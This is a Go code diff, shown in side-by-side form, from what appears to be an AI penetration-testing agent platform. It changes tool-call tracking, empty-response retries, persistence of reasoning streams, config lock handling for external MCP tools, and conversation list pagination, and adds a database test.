type ExecutionRecorder func(executionID string) // toolCallID 来自 Eino compose.GetToolCallID,用于与 reduction 后的展示结果关联。
type ExecutionRecorder func(executionID, toolCallID string)
// ToolErrorPrefix 用于把内部 MCP 执行结果中的 IsError 标记传递到多代理上层。 // ToolErrorPrefix 用于把内部 MCP 执行结果中的 IsError 标记传递到多代理上层。
// Eino 工具通道目前只支持返回字符串,因此通过前缀标识,随后在多代理 runner 中解析为 success/isError。 // Eino 工具通道目前只支持返回字符串,因此通过前缀标识,随后在多代理 runner 中解析为 success/isError。
@@ -178,7 +179,7 @@ func runMCPToolInvocation(
return "", nil return "", nil
} }
if res.ExecutionID != "" && record != nil { if res.ExecutionID != "" && record != nil {
record(res.ExecutionID) record(res.ExecutionID, compose.GetToolCallID(ctx))
} }
if res.IsError { if res.IsError {
return ToolErrorPrefix + res.Result, nil return ToolErrorPrefix + res.Result, nil
+2 -2
View File
@@ -2,8 +2,8 @@ package einomcp
import "sync" import "sync"
// ToolInvokeNotifyHolder 由 Eino run loop 在迭代开始前 Set 回调;MCP 桥在每次 InvokableRun 结束时 Fire // ToolInvokeNotifyHolder 由 Eino run loop 在迭代开始前 Set 回调;MCP/execute 桥在工具调用结束时 Fire
// 用于 ADK 未透出 schema.Tool 事件时仍推送 tool_result、清 pending,避免 UI 卡在「执行中」或迭代末 force-close // 用于清除 pending tool_calltool_result 由 ADK schema.Tool 事件推送,含流式工具与 reduction 后正文)
type ToolInvokeNotifyHolder struct { type ToolInvokeNotifyHolder struct {
mu sync.RWMutex mu sync.RWMutex
fn func(toolCallID, toolName, einoAgent string, success bool, content string, invokeErr error) fn func(toolCallID, toolName, einoAgent string, success bool, content string, invokeErr error)
+79 -5
View File
@@ -101,7 +101,40 @@ func sameResponseStreamMeta(a, b map[string]interface{}) bool {
} }
orchA, _ := a["orchestration"].(string) orchA, _ := a["orchestration"].(string)
orchB, _ := b["orchestration"].(string) orchB, _ := b["orchestration"].(string)
return strings.TrimSpace(orchA) == strings.TrimSpace(orchB) if strings.TrimSpace(orchA) != strings.TrimSpace(orchB) {
return false
}
iterA := responseStreamIterationFromMeta(a)
iterB := responseStreamIterationFromMeta(b)
if iterA != 0 && iterB != 0 && iterA != iterB {
return false
}
streamA, _ := a["streamId"].(string)
streamB, _ := b["streamId"].(string)
streamA = strings.TrimSpace(streamA)
streamB = strings.TrimSpace(streamB)
if streamA != "" && streamB != "" && streamA != streamB {
return false
}
return true
}
func responseStreamIterationFromMeta(m map[string]interface{}) int {
if m == nil {
return 0
}
switch v := m["iteration"].(type) {
case int:
return v
case int32:
return int(v)
case int64:
return int(v)
case float64:
return int(v)
default:
return 0
}
} }
func discardPlanningIfEchoesToolResult(respPlan *responsePlanAgg, toolData interface{}) { func discardPlanningIfEchoesToolResult(respPlan *responsePlanAgg, toolData interface{}) {
@@ -604,13 +637,26 @@ func (h *AgentHandler) runRobotEinoSingleWithRetry(
var resultMA *multiagent.RunResult var resultMA *multiagent.RunResult
var errMA error var errMA error
var transientRunAttempts int var transientRunAttempts int
var emptyResponseAttempts int
for { for {
resultMA, errMA = multiagent.RunEinoSingleChatModelAgent( resultMA, errMA = multiagent.RunEinoSingleChatModelAgent(
taskCtx, h.config, &h.config.MultiAgent, h.agent, h.logger, taskCtx, h.config, &h.config.MultiAgent, h.agent, h.logger,
conversationID, curMsg, curHist, roleTools, progressCallback, nil, h.projectBlackboardBlock(conversationID), conversationID, h.conversationProjectID(conversationID), curMsg, curHist, roleTools, progressCallback, nil, h.projectBlackboardBlock(conversationID),
) )
handledEmpty, exhaustedEmpty := h.handleEinoEmptyResponseContinue(
taskCtx, conversationID, resultMA, errMA, &emptyResponseAttempts,
&curHist, &curMsg, segmentUserMessage, progressCallback, nil,
)
if exhaustedEmpty {
errMA = nil
break
}
if handledEmpty {
continue
}
if errMA == nil { if errMA == nil {
transientRunAttempts = 0 transientRunAttempts = 0
emptyResponseAttempts = 0
break break
} }
if handled, _ := h.handleEinoTransientRetryContinue( if handled, _ := h.handleEinoTransientRetryContinue(
@@ -640,14 +686,27 @@ func (h *AgentHandler) runRobotMultiAgentWithRetry(
var resultMA *multiagent.RunResult var resultMA *multiagent.RunResult
var errMA error var errMA error
var transientRunAttempts int var transientRunAttempts int
var emptyResponseAttempts int
for { for {
resultMA, errMA = multiagent.RunDeepAgent( resultMA, errMA = multiagent.RunDeepAgent(
taskCtx, h.config, &h.config.MultiAgent, h.agent, h.logger, taskCtx, h.config, &h.config.MultiAgent, h.agent, h.logger,
conversationID, curMsg, curHist, roleTools, progressCallback, conversationID, h.conversationProjectID(conversationID), curMsg, curHist, roleTools, progressCallback,
h.agentsMarkdownDir, orchestration, nil, h.projectBlackboardBlock(conversationID), h.agentsMarkdownDir, orchestration, nil, h.projectBlackboardBlock(conversationID),
) )
handledEmpty, exhaustedEmpty := h.handleEinoEmptyResponseContinue(
taskCtx, conversationID, resultMA, errMA, &emptyResponseAttempts,
&curHist, &curMsg, segmentUserMessage, progressCallback, nil,
)
if exhaustedEmpty {
errMA = nil
break
}
if handledEmpty {
continue
}
if errMA == nil { if errMA == nil {
transientRunAttempts = 0 transientRunAttempts = 0
emptyResponseAttempts = 0
break break
} }
if handled, _ := h.handleEinoTransientRetryContinue( if handled, _ := h.handleEinoTransientRetryContinue(
@@ -1126,6 +1185,8 @@ func (h *AgentHandler) createProgressCallback(runCtx context.Context, cancelRun
} }
} }
flushResponsePlan() flushResponsePlan()
// 助手正文开始前,推理流通常已结束;落库以便刷新后「渗透测试详情」可回放
flushThinkingStreams()
respPlan.meta = nil respPlan.meta = nil
if dataMap, ok := data.(map[string]interface{}); ok { if dataMap, ok := data.(map[string]interface{}); ok {
respPlan.meta = make(map[string]interface{}, len(dataMap)) respPlan.meta = make(map[string]interface{}, len(dataMap))
@@ -1161,6 +1222,19 @@ func (h *AgentHandler) createProgressCallback(runCtx context.Context, cancelRun
} }
if eventType == "response" { if eventType == "response" {
flushResponsePlan() flushResponsePlan()
flushThinkingStreams()
return
}
if eventType == "done" {
flushResponsePlan()
flushThinkingStreams()
return
}
// 流式思考/推理结束:聚合落库(与 eino_agent_reply_stream_end 同理)
if eventType == "thinking_stream_end" || eventType == "reasoning_chain_stream_end" {
flushResponsePlan()
flushThinkingStreams()
return return
} }
@@ -2159,12 +2233,12 @@ func (h *AgentHandler) executeBatchQueue(queueID string) {
var runErr error var runErr error
switch { switch {
case useBatchMulti: case useBatchMulti:
resultMA, runErr = multiagent.RunDeepAgent(taskCtx, h.config, &h.config.MultiAgent, h.agent, h.logger, conversationID, finalMessage, []agent.ChatMessage{}, roleTools, progressCallback, h.agentsMarkdownDir, batchOrch, nil, h.projectBlackboardBlock(conversationID)) resultMA, runErr = multiagent.RunDeepAgent(taskCtx, h.config, &h.config.MultiAgent, h.agent, h.logger, conversationID, h.conversationProjectID(conversationID), finalMessage, []agent.ChatMessage{}, roleTools, progressCallback, h.agentsMarkdownDir, batchOrch, nil, h.projectBlackboardBlock(conversationID))
default: default:
if h.config == nil { if h.config == nil {
runErr = fmt.Errorf("服务器配置未加载") runErr = fmt.Errorf("服务器配置未加载")
} else { } else {
resultMA, runErr = multiagent.RunEinoSingleChatModelAgent(taskCtx, h.config, &h.config.MultiAgent, h.agent, h.logger, conversationID, finalMessage, []agent.ChatMessage{}, roleTools, progressCallback, nil, h.projectBlackboardBlock(conversationID)) resultMA, runErr = multiagent.RunEinoSingleChatModelAgent(taskCtx, h.config, &h.config.MultiAgent, h.agent, h.logger, conversationID, h.conversationProjectID(conversationID), finalMessage, []agent.ChatMessage{}, roleTools, progressCallback, nil, h.projectBlackboardBlock(conversationID))
} }
} }
@@ -3,10 +3,14 @@ package handler
import ( import (
"context" "context"
"fmt" "fmt"
"os"
"path/filepath"
"sync" "sync"
"testing" "testing"
"cyberstrike-ai/internal/config" "cyberstrike-ai/internal/config"
"cyberstrike-ai/internal/database"
"cyberstrike-ai/internal/openai"
"go.uber.org/zap" "go.uber.org/zap"
) )
@@ -46,3 +50,50 @@ func TestCreateProgressCallback_ConcurrentToolEvents(t *testing.T) {
} }
wg.Wait() wg.Wait()
} }
// TestCreateProgressCallback_FlushesReasoningOnDone 流式推理聚合须在 done/response 时落库,刷新后可回放。
func TestCreateProgressCallback_FlushesReasoningOnDone(t *testing.T) {
tmp := t.TempDir()
db, err := database.NewDB(filepath.Join(tmp, "test.sqlite"), zap.NewNop())
if err != nil {
t.Fatalf("NewDB: %v", err)
}
defer os.RemoveAll(tmp)
conv, err := db.CreateConversation("test", database.ConversationCreateMeta{})
if err != nil {
t.Fatalf("CreateConversation: %v", err)
}
asst, err := db.AddMessage(conv.ID, "assistant", "处理中...", nil)
if err != nil {
t.Fatalf("AddMessage: %v", err)
}
h := &AgentHandler{logger: zap.NewNop(), db: db}
cb := h.createProgressCallback(context.Background(), nil, conv.ID, asst.ID, nil)
streamID := "eino-reasoning-test-1"
cb("reasoning_chain_stream_start", " ", map[string]interface{}{
"streamId": streamID,
"source": "eino",
})
cb("reasoning_chain_stream_delta", "step one", openai.WithSSEAccumulated(map[string]interface{}{
"streamId": streamID,
}, "step one"))
cb("done", "", map[string]interface{}{"conversationId": conv.ID})
details, err := db.GetProcessDetails(asst.ID)
if err != nil {
t.Fatalf("GetProcessDetails: %v", err)
}
found := false
for _, d := range details {
if d.EventType == "reasoning_chain" && d.Message == "step one" {
found = true
break
}
}
if !found {
t.Fatalf("expected reasoning_chain persisted on done, got %+v", details)
}
}
+2 -3
View File
@@ -2,7 +2,6 @@ package handler
import ( import (
"strconv" "strconv"
"time"
"cyberstrike-ai/internal/database" "cyberstrike-ai/internal/database"
@@ -20,12 +19,12 @@ func auditFilterFromQuery(c *gin.Context) database.ListAuditLogsFilter {
ResourceID: c.Query("resource_id"), ResourceID: c.Query("resource_id"),
} }
if since := c.Query("since"); since != "" { if since := c.Query("since"); since != "" {
if t, err := time.Parse(time.RFC3339, since); err == nil { if t, err := database.ParseRFC3339Time(since); err == nil {
filter.Since = &t filter.Since = &t
} }
} }
if until := c.Query("until"); until != "" { if until := c.Query("until"); until != "" {
if t, err := time.Parse(time.RFC3339, until); err == nil { if t, err := database.ParseRFC3339Time(until); err == nil {
filter.Until = &t filter.Until = &t
} }
} }
+108 -71
View File
@@ -298,7 +298,7 @@ func (h *ConfigHandler) GetConfig(c *gin.Context) {
} }
} }
// 获取外部MCP工具 // 获取外部MCP工具(走缓存,持锁期间通常不阻塞)
if h.externalMCPMgr != nil { if h.externalMCPMgr != nil {
ctx := context.Background() ctx := context.Background()
externalTools := h.getExternalMCPTools(ctx) externalTools := h.getExternalMCPTools(ctx)
@@ -359,9 +359,6 @@ type GetToolsResponse struct {
// GetTools 获取工具列表(支持分页和搜索) // GetTools 获取工具列表(支持分页和搜索)
func (h *ConfigHandler) GetTools(c *gin.Context) { func (h *ConfigHandler) GetTools(c *gin.Context) {
h.mu.RLock()
defer h.mu.RUnlock()
c.Header("Cache-Control", "no-store, no-cache, must-revalidate") c.Header("Cache-Control", "no-store, no-cache, must-revalidate")
// 解析分页参数 // 解析分页参数
@@ -407,12 +404,37 @@ func (h *ConfigHandler) GetTools(c *gin.Context) {
} }
} }
includeExternal := true
if v := strings.TrimSpace(strings.ToLower(c.Query("include_external"))); v == "0" || v == "false" || v == "no" {
includeExternal = false
}
refreshExternal := false
if v := strings.TrimSpace(strings.ToLower(c.Query("refresh_external"))); v == "1" || v == "true" || v == "yes" {
refreshExternal = true
}
// 按外部 MCP 名称筛选(MCP 管理页左侧卡片 → 右侧工具列表联动)
externalMCPFilter := strings.TrimSpace(c.Query("external_mcp"))
// 快照配置后立即释放锁,避免外部 MCP 网络 IO 阻塞整个配置子系统
h.mu.RLock()
securityTools := append([]config.ToolConfig(nil), h.config.Security.Tools...)
roles := h.config.Roles
toolDescriptionMode := h.config.Security.ToolDescriptionMode
mcpServer := h.mcpServer
externalMCPMgr := h.externalMCPMgr
h.mu.RUnlock()
pickDesc := func(shortDesc, fullDesc string) string {
return pickToolDescriptionWithMode(toolDescriptionMode, shortDesc, fullDesc)
}
// 解析角色参数,用于过滤工具并标注启用状态 // 解析角色参数,用于过滤工具并标注启用状态
roleName := c.Query("role") roleName := c.Query("role")
var roleToolsSet map[string]bool // 角色配置的工具集合 var roleToolsSet map[string]bool // 角色配置的工具集合
var roleUsesAllTools bool = true // 角色是否使用所有工具(默认角色) var roleUsesAllTools bool = true // 角色是否使用所有工具(默认角色)
if roleName != "" && roleName != "默认" && h.config.Roles != nil { if roleName != "" && roleName != "默认" && roles != nil {
if role, exists := h.config.Roles[roleName]; exists && role.Enabled { if role, exists := roles[roleName]; exists && role.Enabled {
if len(role.Tools) > 0 { if len(role.Tools) > 0 {
// 角色配置了工具列表,只使用这些工具 // 角色配置了工具列表,只使用这些工具
roleToolsSet = make(map[string]bool) roleToolsSet = make(map[string]bool)
@@ -426,12 +448,12 @@ func (h *ConfigHandler) GetTools(c *gin.Context) {
// 获取所有内部工具并应用搜索过滤 // 获取所有内部工具并应用搜索过滤
configToolMap := make(map[string]bool) configToolMap := make(map[string]bool)
allTools := make([]ToolConfigInfo, 0, len(h.config.Security.Tools)) allTools := make([]ToolConfigInfo, 0, len(securityTools))
for _, tool := range h.config.Security.Tools { for _, tool := range securityTools {
configToolMap[tool.Name] = true configToolMap[tool.Name] = true
toolInfo := ToolConfigInfo{ toolInfo := ToolConfigInfo{
Name: tool.Name, Name: tool.Name,
Description: h.pickToolDescription(tool.ShortDescription, tool.Description), Description: pickDesc(tool.ShortDescription, tool.Description),
Enabled: tool.Enabled, Enabled: tool.Enabled,
IsExternal: false, IsExternal: false,
} }
@@ -479,15 +501,15 @@ func (h *ConfigHandler) GetTools(c *gin.Context) {
} }
// 从MCP服务器获取所有已注册的工具(包括直接注册的工具,如知识检索工具) // 从MCP服务器获取所有已注册的工具(包括直接注册的工具,如知识检索工具)
if h.mcpServer != nil { if mcpServer != nil {
mcpTools := h.mcpServer.GetAllTools() mcpTools := mcpServer.GetAllTools()
for _, mcpTool := range mcpTools { for _, mcpTool := range mcpTools {
// 跳过已经在配置文件中的工具(避免重复) // 跳过已经在配置文件中的工具(避免重复)
if configToolMap[mcpTool.Name] { if configToolMap[mcpTool.Name] {
continue continue
} }
description := h.pickToolDescription(mcpTool.ShortDescription, mcpTool.Description) description := pickDesc(mcpTool.ShortDescription, mcpTool.Description)
toolInfo := ToolConfigInfo{ toolInfo := ToolConfigInfo{
Name: mcpTool.Name, Name: mcpTool.Name,
@@ -534,11 +556,13 @@ func (h *ConfigHandler) GetTools(c *gin.Context) {
} }
} }
// 获取外部MCP工具 // 获取外部MCP工具(可走缓存,不持有 config 锁)
if h.externalMCPMgr != nil { if includeExternal && externalMCPMgr != nil {
// 创建context用于获取外部工具 if refreshExternal {
externalMCPMgr.InvalidateAllToolCaches()
}
ctx := context.Background() ctx := context.Background()
externalTools := h.getExternalMCPTools(ctx) externalTools := h.getExternalMCPToolsWithManager(ctx, externalMCPMgr, pickDesc)
// 应用搜索过滤和角色配置 // 应用搜索过滤和角色配置
for _, toolInfo := range externalTools { for _, toolInfo := range externalTools {
@@ -585,6 +609,16 @@ func (h *ConfigHandler) GetTools(c *gin.Context) {
// 注意:这里我们不直接过滤掉工具,而是保留所有工具,但通过 role_enabled 字段标注状态 // 注意:这里我们不直接过滤掉工具,而是保留所有工具,但通过 role_enabled 字段标注状态
// 这样前端可以显示所有工具,并标注哪些工具在当前角色中可用 // 这样前端可以显示所有工具,并标注哪些工具在当前角色中可用
if externalMCPFilter != "" {
filtered := make([]ToolConfigInfo, 0)
for _, tool := range allTools {
if tool.IsExternal && tool.ExternalMCP == externalMCPFilter {
filtered = append(filtered, tool)
}
}
allTools = filtered
}
// 统一按名称排序后再分页,避免配置文件中顺序导致「全部」与「仅已启用」前几页看起来完全一致 // 统一按名称排序后再分页,避免配置文件中顺序导致「全部」与「仅已启用」前几页看起来完全一致
sort.SliceStable(allTools, func(i, j int) bool { sort.SliceStable(allTools, func(i, j int) bool {
key := func(t ToolConfigInfo) string { key := func(t ToolConfigInfo) string {
@@ -654,11 +688,9 @@ type UpdateConfigRequest struct {
// AgentConfigUpdate 用于 PATCH /api/config 的 agent 段:仅 JSON 中出现的字段(指针非 nil)覆盖内存配置。 // AgentConfigUpdate 用于 PATCH /api/config 的 agent 段:仅 JSON 中出现的字段(指针非 nil)覆盖内存配置。
// 避免旧版「整包替换 *AgentConfig」时,未传的整型字段被反序列化为 0 误覆盖(例如 tool_timeout_minutes 变成 0)。 // 避免旧版「整包替换 *AgentConfig」时,未传的整型字段被反序列化为 0 误覆盖(例如 tool_timeout_minutes 变成 0)。
type AgentConfigUpdate struct { type AgentConfigUpdate struct {
MaxIterations *int `json:"max_iterations,omitempty"` MaxIterations *int `json:"max_iterations,omitempty"`
LargeResultThreshold *int `json:"large_result_threshold,omitempty"` ToolTimeoutMinutes *int `json:"tool_timeout_minutes,omitempty"`
ResultStorageDir *string `json:"result_storage_dir,omitempty"` SystemPromptPath *string `json:"system_prompt_path,omitempty"`
ToolTimeoutMinutes *int `json:"tool_timeout_minutes,omitempty"`
SystemPromptPath *string `json:"system_prompt_path,omitempty"`
} }
func applyAgentConfigUpdate(dst *config.AgentConfig, src *AgentConfigUpdate) { func applyAgentConfigUpdate(dst *config.AgentConfig, src *AgentConfigUpdate) {
@@ -668,12 +700,6 @@ func applyAgentConfigUpdate(dst *config.AgentConfig, src *AgentConfigUpdate) {
if src.MaxIterations != nil { if src.MaxIterations != nil {
dst.MaxIterations = *src.MaxIterations dst.MaxIterations = *src.MaxIterations
} }
if src.LargeResultThreshold != nil {
dst.LargeResultThreshold = *src.LargeResultThreshold
}
if src.ResultStorageDir != nil {
dst.ResultStorageDir = *src.ResultStorageDir
}
if src.ToolTimeoutMinutes != nil { if src.ToolTimeoutMinutes != nil {
dst.ToolTimeoutMinutes = *src.ToolTimeoutMinutes dst.ToolTimeoutMinutes = *src.ToolTimeoutMinutes
} }
@@ -1498,8 +1524,6 @@ func updateAgentConfig(doc *yaml.Node, agent config.AgentConfig) {
agentNode := ensureMap(root, "agent") agentNode := ensureMap(root, "agent")
setIntInMap(agentNode, "max_iterations", agent.MaxIterations) setIntInMap(agentNode, "max_iterations", agent.MaxIterations)
setIntInMap(agentNode, "tool_timeout_minutes", agent.ToolTimeoutMinutes) setIntInMap(agentNode, "tool_timeout_minutes", agent.ToolTimeoutMinutes)
setIntInMap(agentNode, "large_result_threshold", agent.LargeResultThreshold)
setStringInMap(agentNode, "result_storage_dir", agent.ResultStorageDir)
setStringInMap(agentNode, "system_prompt_path", agent.SystemPromptPath) setStringInMap(agentNode, "system_prompt_path", agent.SystemPromptPath)
} }
@@ -1906,50 +1930,52 @@ func setFloatInMap(mapNode *yaml.Node, key string, value float64) {
} }
// getExternalMCPTools 获取外部MCP工具列表(公共方法) // getExternalMCPTools 获取外部MCP工具列表(公共方法)
// 返回 ToolConfigInfo 列表,已处理启用状态和描述信息
func (h *ConfigHandler) getExternalMCPTools(ctx context.Context) []ToolConfigInfo { func (h *ConfigHandler) getExternalMCPTools(ctx context.Context) []ToolConfigInfo {
var result []ToolConfigInfo
if h.externalMCPMgr == nil { if h.externalMCPMgr == nil {
return nil
}
return h.getExternalMCPToolsWithManager(ctx, h.externalMCPMgr, h.pickToolDescription)
}
// getExternalMCPToolsWithManager 获取外部 MCP 工具(不持有 config 锁,供 GetTools 等热路径使用)
func (h *ConfigHandler) getExternalMCPToolsWithManager(
ctx context.Context,
mgr *mcp.ExternalMCPManager,
pickDesc func(shortDesc, fullDesc string) string,
) []ToolConfigInfo {
var result []ToolConfigInfo
if mgr == nil {
return result return result
} }
// 使用较短的超时时间(5秒)进行快速失败,避免阻塞页面加载
timeoutCtx, cancel := context.WithTimeout(ctx, 5*time.Second) timeoutCtx, cancel := context.WithTimeout(ctx, 5*time.Second)
defer cancel() defer cancel()
externalTools, err := h.externalMCPMgr.GetAllTools(timeoutCtx) externalTools, err := mgr.GetAllTools(timeoutCtx)
if err != nil { if err != nil {
// 记录警告但不阻塞,继续返回已缓存的工具(如果有)
h.logger.Warn("获取外部MCP工具失败(可能连接断开),尝试返回缓存的工具", h.logger.Warn("获取外部MCP工具失败(可能连接断开),尝试返回缓存的工具",
zap.Error(err), zap.Error(err),
zap.String("hint", "如果外部MCP工具未显示,请检查连接状态或点击刷新按钮"), zap.String("hint", "如果外部MCP工具未显示,请检查连接状态或点击刷新按钮"),
) )
} }
// 如果获取到了工具(即使有错误),继续处理
if len(externalTools) == 0 { if len(externalTools) == 0 {
return result return result
} }
externalMCPConfigs := h.externalMCPMgr.GetConfigs() externalMCPConfigs := mgr.GetConfigs()
for _, externalTool := range externalTools { for _, externalTool := range externalTools {
// 解析工具名称:mcpName::toolName
mcpName, actualToolName := h.parseExternalToolName(externalTool.Name) mcpName, actualToolName := h.parseExternalToolName(externalTool.Name)
if mcpName == "" || actualToolName == "" { if mcpName == "" || actualToolName == "" {
continue // 跳过格式不正确的工具 continue
} }
// 计算启用状态 enabled := h.calculateExternalToolEnabledWithManager(mcpName, actualToolName, externalMCPConfigs, mgr)
enabled := h.calculateExternalToolEnabled(mcpName, actualToolName, externalMCPConfigs)
// 处理描述信息
description := h.pickToolDescription(externalTool.ShortDescription, externalTool.Description)
result = append(result, ToolConfigInfo{ result = append(result, ToolConfigInfo{
Name: actualToolName, Name: actualToolName,
Description: description, Description: pickDesc(externalTool.ShortDescription, externalTool.Description),
Enabled: enabled, Enabled: enabled,
IsExternal: true, IsExternal: true,
ExternalMCP: mcpName, ExternalMCP: mcpName,
@@ -1970,40 +1996,48 @@ func (h *ConfigHandler) parseExternalToolName(fullName string) (mcpName, toolNam
// calculateExternalToolEnabled 计算外部工具的启用状态 // calculateExternalToolEnabled 计算外部工具的启用状态
func (h *ConfigHandler) calculateExternalToolEnabled(mcpName, toolName string, configs map[string]config.ExternalMCPServerConfig) bool { func (h *ConfigHandler) calculateExternalToolEnabled(mcpName, toolName string, configs map[string]config.ExternalMCPServerConfig) bool {
return h.calculateExternalToolEnabledWithManager(mcpName, toolName, configs, h.externalMCPMgr)
}
func (h *ConfigHandler) calculateExternalToolEnabledWithManager(
mcpName, toolName string,
configs map[string]config.ExternalMCPServerConfig,
mgr *mcp.ExternalMCPManager,
) bool {
cfg, exists := configs[mcpName] cfg, exists := configs[mcpName]
if !exists { if !exists {
return false return false
} }
// 首先检查外部MCP是否启用
if !cfg.ExternalMCPEnable { if !cfg.ExternalMCPEnable {
return false // MCP未启用,所有工具都禁用 return false
} }
// MCP已启用,检查单个工具的启用状态 if cfg.ToolEnabled != nil {
// 如果ToolEnabled为空或未设置该工具,默认为启用(向后兼容) if toolEnabled, exists := cfg.ToolEnabled[toolName]; exists && !toolEnabled {
if cfg.ToolEnabled == nil {
// 未设置工具状态,默认为启用
} else if toolEnabled, exists := cfg.ToolEnabled[toolName]; exists {
// 使用配置的工具状态
if !toolEnabled {
return false return false
} }
} }
// 工具未在配置中,默认为启用
// 最后检查外部MCP是否已连接 if mgr == nil {
client, exists := h.externalMCPMgr.GetClient(mcpName) return false
}
client, exists := mgr.GetClient(mcpName)
if !exists || !client.IsConnected() { if !exists || !client.IsConnected() {
return false // 未连接时视为禁用 return false
} }
return true return true
} }
// pickToolDescription 根据 security.tool_description_mode 选择 short 或 full 描述并限制长度 // pickToolDescription 根据 security.tool_description_mode 选择 short 或 full 描述并限制长度
// 调用方若已持有 h.mu 读锁,须直接读 mode 并调用 pickToolDescriptionWithMode,避免嵌套 RLock 死锁。
func (h *ConfigHandler) pickToolDescription(shortDesc, fullDesc string) string { func (h *ConfigHandler) pickToolDescription(shortDesc, fullDesc string) string {
useFull := strings.TrimSpace(strings.ToLower(h.config.Security.ToolDescriptionMode)) == "full" return pickToolDescriptionWithMode(h.config.Security.ToolDescriptionMode, shortDesc, fullDesc)
}
func pickToolDescriptionWithMode(mode, shortDesc, fullDesc string) string {
useFull := strings.TrimSpace(strings.ToLower(mode)) == "full"
description := shortDesc description := shortDesc
if useFull { if useFull {
description = fullDesc description = fullDesc
@@ -2018,23 +2052,22 @@ func (h *ConfigHandler) pickToolDescription(shortDesc, fullDesc string) string {
// GetToolSchema 获取单个工具的 inputSchema(按需加载,避免列表接口返回大量 schema 数据) // GetToolSchema 获取单个工具的 inputSchema(按需加载,避免列表接口返回大量 schema 数据)
func (h *ConfigHandler) GetToolSchema(c *gin.Context) { func (h *ConfigHandler) GetToolSchema(c *gin.Context) {
h.mu.RLock()
defer h.mu.RUnlock()
toolName := c.Param("name") toolName := c.Param("name")
if toolName == "" { if toolName == "" {
c.JSON(http.StatusBadRequest, gin.H{"error": "工具名称不能为空"}) c.JSON(http.StatusBadRequest, gin.H{"error": "工具名称不能为空"})
return return
} }
// 检查是否为外部工具(格式:mcpName::toolName
externalMCP := c.Query("external_mcp") externalMCP := c.Query("external_mcp")
if externalMCP != "" { if externalMCP != "" {
// 外部 MCP 工具 h.mu.RLock()
if h.externalMCPMgr != nil { externalMCPMgr := h.externalMCPMgr
h.mu.RUnlock()
if externalMCPMgr != nil {
ctx, cancel := context.WithTimeout(context.Background(), 5*time.Second) ctx, cancel := context.WithTimeout(context.Background(), 5*time.Second)
defer cancel() defer cancel()
externalTools, _ := h.externalMCPMgr.GetAllTools(ctx) externalTools, _ := externalMCPMgr.GetAllTools(ctx)
fullName := externalMCP + "::" + toolName fullName := externalMCP + "::" + toolName
for _, t := range externalTools { for _, t := range externalTools {
if t.Name == fullName { if t.Name == fullName {
@@ -2047,8 +2080,12 @@ func (h *ConfigHandler) GetToolSchema(c *gin.Context) {
return return
} }
// 内部工具:从 YAML 配置的 Parameters 构建 h.mu.RLock()
for _, tool := range h.config.Security.Tools { securityTools := append([]config.ToolConfig(nil), h.config.Security.Tools...)
mcpServer := h.mcpServer
h.mu.RUnlock()
for _, tool := range securityTools {
if tool.Name == toolName { if tool.Name == toolName {
c.JSON(http.StatusOK, gin.H{"input_schema": buildInputSchemaFromParams(tool.Parameters)}) c.JSON(http.StatusOK, gin.H{"input_schema": buildInputSchemaFromParams(tool.Parameters)})
return return
@@ -2056,8 +2093,8 @@ func (h *ConfigHandler) GetToolSchema(c *gin.Context) {
} }
// MCP 注册工具(如知识检索) // MCP 注册工具(如知识检索)
if h.mcpServer != nil { if mcpServer != nil {
for _, mt := range h.mcpServer.GetAllTools() { for _, mt := range mcpServer.GetAllTools() {
if mt.Name == toolName { if mt.Name == toolName {
c.JSON(http.StatusOK, gin.H{"input_schema": mt.InputSchema}) c.JSON(http.StatusOK, gin.H{"input_schema": mt.InputSchema})
return return
+30 -4
View File
@@ -96,18 +96,44 @@ func (h *ConversationHandler) ListConversations(c *gin.Context) {
limit, _ := strconv.Atoi(limitStr) limit, _ := strconv.Atoi(limitStr)
offset, _ := strconv.Atoi(offsetStr) offset, _ := strconv.Atoi(offsetStr)
if limit <= 0 || limit > 100 { if limit <= 0 {
limit = 50 limit = 50
} }
if limit > 1000 {
limit = 1000
}
conversations, err := h.db.ListConversations(limit, offset, search) excludeGrouped := strings.TrimSpace(search) == "" &&
(c.Query("exclude_grouped") == "true" || c.Query("exclude_grouped") == "1")
var conversations []*database.Conversation
var total int
var err error
if excludeGrouped {
conversations, err = h.db.ListUngroupedConversations(limit, offset)
if err == nil {
total, err = h.db.CountUngroupedConversations()
}
} else {
conversations, err = h.db.ListConversations(limit, offset, search)
if err == nil {
total, err = h.db.CountConversations(search)
}
}
if err != nil { if err != nil {
h.logger.Error("获取对话列表失败", zap.Error(err)) h.logger.Error("获取对话列表失败", zap.Error(err))
c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()}) c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()})
return return
} }
if conversations == nil {
c.JSON(http.StatusOK, conversations) conversations = []*database.Conversation{}
}
c.JSON(http.StatusOK, gin.H{
"conversations": conversations,
"total": total,
"limit": limit,
"offset": offset,
})
} }
// GetConversation 获取对话 // GetConversation 获取对话
+58
View File
@@ -9,6 +9,8 @@ import (
"cyberstrike-ai/internal/agent" "cyberstrike-ai/internal/agent"
"cyberstrike-ai/internal/multiagent" "cyberstrike-ai/internal/multiagent"
"go.uber.org/zap"
) )
func (h *AgentHandler) einoRunRetryMaxAttempts() int { func (h *AgentHandler) einoRunRetryMaxAttempts() int {
@@ -120,3 +122,59 @@ func (h *AgentHandler) handleEinoTransientRetryContinue(
} }
return true, nil return true, nil
} }
// handleEinoEmptyResponseContinue 在 SSE 任务循环内处理「正常结束但无助手正文」;返回 exhausted=true 时由外层按成功结束(保留占位文案)。
// 与临时错误重试一致:仅恢复轨迹并保留本请求原始 user 文案,不向模型注入续跑说明。
func (h *AgentHandler) handleEinoEmptyResponseContinue(
baseCtx context.Context,
conversationID string,
result *multiagent.RunResult,
runErr error,
emptyResponseAttempts *int,
curHistory *[]agent.ChatMessage,
curFinalMessage *string,
segmentUserMessage string,
progressCallback func(eventType, message string, data interface{}),
sendProgress func(msg string, extra map[string]interface{}),
) (handled bool, exhausted bool) {
if !errors.Is(runErr, multiagent.ErrEmptyResponseContinue) {
return false, false
}
maxAttempts := h.einoRunRetryMaxAttempts()
*emptyResponseAttempts++
if *emptyResponseAttempts > maxAttempts {
if h.logger != nil {
h.logger.Warn("eino empty response auto resume exhausted",
zap.String("conversationId", conversationID),
zap.Int("maxAttempts", maxAttempts))
}
if shouldPersistEinoAgentTraceAfterRunError(baseCtx) {
h.persistEinoAgentTraceForResume(conversationID, result)
}
return false, true
}
attemptNo := *emptyResponseAttempts
if h.logger != nil {
h.logger.Info("eino empty response, auto resume from trace",
zap.String("conversationId", conversationID),
zap.Int("attempt", attemptNo),
zap.Int("maxAttempts", maxAttempts))
}
if progressCallback != nil {
